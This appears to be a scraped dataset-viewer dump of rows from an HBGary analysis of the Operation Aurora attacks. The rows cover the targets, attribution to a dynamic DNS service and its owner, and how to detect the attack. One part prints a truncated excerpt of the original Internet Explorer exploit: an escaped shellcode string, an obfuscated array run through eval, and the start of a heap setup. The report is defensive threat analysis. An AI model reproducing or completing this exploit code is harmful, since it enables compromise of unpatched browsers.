text
stringlengths 4
429
|
---|
code and technical diagrams (CAD, oil exploration bid-data, etc). Companies hit have been |
publically speculated, including Google, Adobe, Yahoo, Symantec, Juniper Systems, Rackspace, |
Northrop Grumman, ExxonMobil, ConocoPhillips, and Dow Chemical. The malware package |
used with Aurora is mature and been in development since at least 2006. |
The Aurora operation is characterized by a remotely operated backdoor program that persists on |
a Windows computer. This backdoor program has several capabilities that are outline below. |
KEY FINDINGS |
Evidence collected around the malware operation suggest that Operation Aurora is simply an |
example of highly effective malware penetration. There is not significant evidence to attribute |
the operation directly to the Chinese Government. However, a key actor has been identified in |
association with Operation Aurora. |
Aspect |
Description |
Target |
The operation is targeting intellectual property with no specific industry focus. |
This is an example of "not knowing what they are looking for until they find it". |
It is highly probable that the malware was developed in native Chinese language, |
and the operation control system is designed for Chinese users, indicating the entire |
operation is Chinese. This does not, however, mean the Chinese Government is |
using the system. |
Forensic tool-marks in the CRC algorithm can be traced to Chinese origin. That, |
combined with domain registration information, leads to at least one potential actor, |
Peng Yongii. The malware has been in development since at least 2006. It has been |
updated several times. |
Operators of the malware appear to use certain domains for C&C control. |
Dynamic DNS is a key feature of the operation, with many known C&C servers |
operating from domains registered through Peng Yong's 3322.org service. |
The primary intent is the theft of intellectual property. |
Communication is encrypted over HTTP, port 443, obfuscated with a weak |
encryption scheme. The C&C servers tend to operate from domains hosted on |
dynamic DNS. |
Origin |
Developers |
Operators |
Intent |
Coms |
ATTRIBUTION |
At this time, there is very little available in terms of attribution. A CRC algorithm tends to |
indicate the malware package is of Chinese origin, and many attacks are sourced out of a service |
called 3322.org - a small company operating out of Changzhou. The owner is Peng Yong, a |
Mandarin speaker who may have some programming background with such algorithms. His |
dynamic DNS service hosts over 1 million domain names. Over the last year, HBGary has |
analyzed thousands of distinct malware samples that communicate with 3322.org. While Peng |
Yong is clearly tolerant of cyber crime operating through his domain services, this does not |
indicate he has any direct involvement with Aurora. |
Toolmark |
Description |
Embedded Resource Language Code |
CRC Algorithm Table of Constants |
DNS registration services |
UNITED STATES |
Embedded systems / Chinese publicationiii |
Peng Yong, others |
D ETECT |
This section of the report details how you can detect Operation Aurora in your Enterprise. The exploit and payload |
vehicle consists of the following components: |
Javascript based exploit vector, known to exploit IE 6 |
Shellcode component, embedded in the Javascript |
Secondary payload server that delivers a dropper |
The dropper itself, which only used once and then deleted |
The backdoor program which is decompressed from the dropper |
JA VAS C RI PT AND SH ELLC ODE |
The JavaScript based attack vector associated with Operation Aurora was published in the public domain in early January |
2010. Microsoft details the vulnerability in Security Bulletin MS10-002. Internet Explorer 5.01, Internet Explorer 6, |
Internet Explorer 6 Service Pack 1, Internet Explorer 7, and Internet Explorer 8 (except Internet Explorer 6 for supported |
editions of Windows Server 2003) are affected. Exploit code analyzed by HBGary reveals that only Internet Explorer 6 |
was targeted during Operation Aurora. This vulnerability can be leveraged by attackers of varying skill levels due to the |
public availability of the Metasploit module |
ie_aurora.rb |
. The exploit code used by the original attackers was quickly |
improved and added to Metasploit thus greatly expanding the potential number of attackers and reliability of code. |
The JavaScript performs a heap spray attack and injects the embedded shellcode described below. The JavaScript |
exploits the vulnerability in Internet Explorer by copying, releasing, and then referencing a Document Object Model |
(DOM) element. |
Javascript Exploit Code |
<html> |
<head> |
<script> |
var sc = |
unescape("%u9090%u19eb%u4b5b%u3390%u90c9%u7b80%ue901%u0175%u66c3%u7bb9%u8004%u0b34%ue2d8%uebfa%ue805%uffe2%uffff%u3931%ud8db%u87 |
d8%u79bc%ud8e8%ud8d8%u9853%u53d4%uc4a8%u5375%ud0b0%u2f53%ud7b2%u3081%udb59%ud8d8%u3a48%ub020%ueaeb%ud8d8%u8db0%ubdab%u8caa%u9e53 |
%u30d4%uda37%ud8d8%u3053%ud9b2%u308 |
SECTION REMOVED FOR SPACE... |
8%udfa7%ufa4a%uc6a8%ubc7c%u4b37%u3cea%u564c%ud2cb%ua174%u3ee1%u1c40%uc755%u8fac%ud5be%u9b27%u7466%u4003%uc8d2%u5820%u770e%u2342% |
ucd8b%ub0be%uacac%ue2a8%uf7f7%ubdbc%ub7b5%uf6e9%uacbe%ub9a8%ubbbb%uabbd%uf6ab%ubbbb%ubcf7%ub5bd%uf7b7%ubcb9%ub2f6%ubfa8%u00d8"); |
var sss = Array (826, 679, 798, 224, 770, 427, 819, 770, 707, 805, 693, 679, 784, 707, 280, |
238, 259, 819, 336, 693, 336, 700, 259, 819, 336, 693, 336, 700, 238, 287, 413, 224, 833, |
SECTION REMOVED FOR SPACE... |
735, 427, 336, 413, 735, 420, 350, 336, 336, 413, 735, 301, 301, 287, 224, 861, 840, 637, |
735, 651, 427, 770, 301, 805, 693, 413, 875); |
var arr = new Array; |
for (var i = 0; i < sss.length; i ++) { |
arr[i] = String.fromCharCode (sss [i] / 7); |
var cc = arr.toString (); |
cc = cc.replace (/,/g, ""); |
cc = cc.replace (/@/g, ","); |
eval (cc); |
var x1 = new Array (); |
for (i = 0; i < 200; i ++) { |
x1 [i] = document.createElement ("COMMENT"); |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.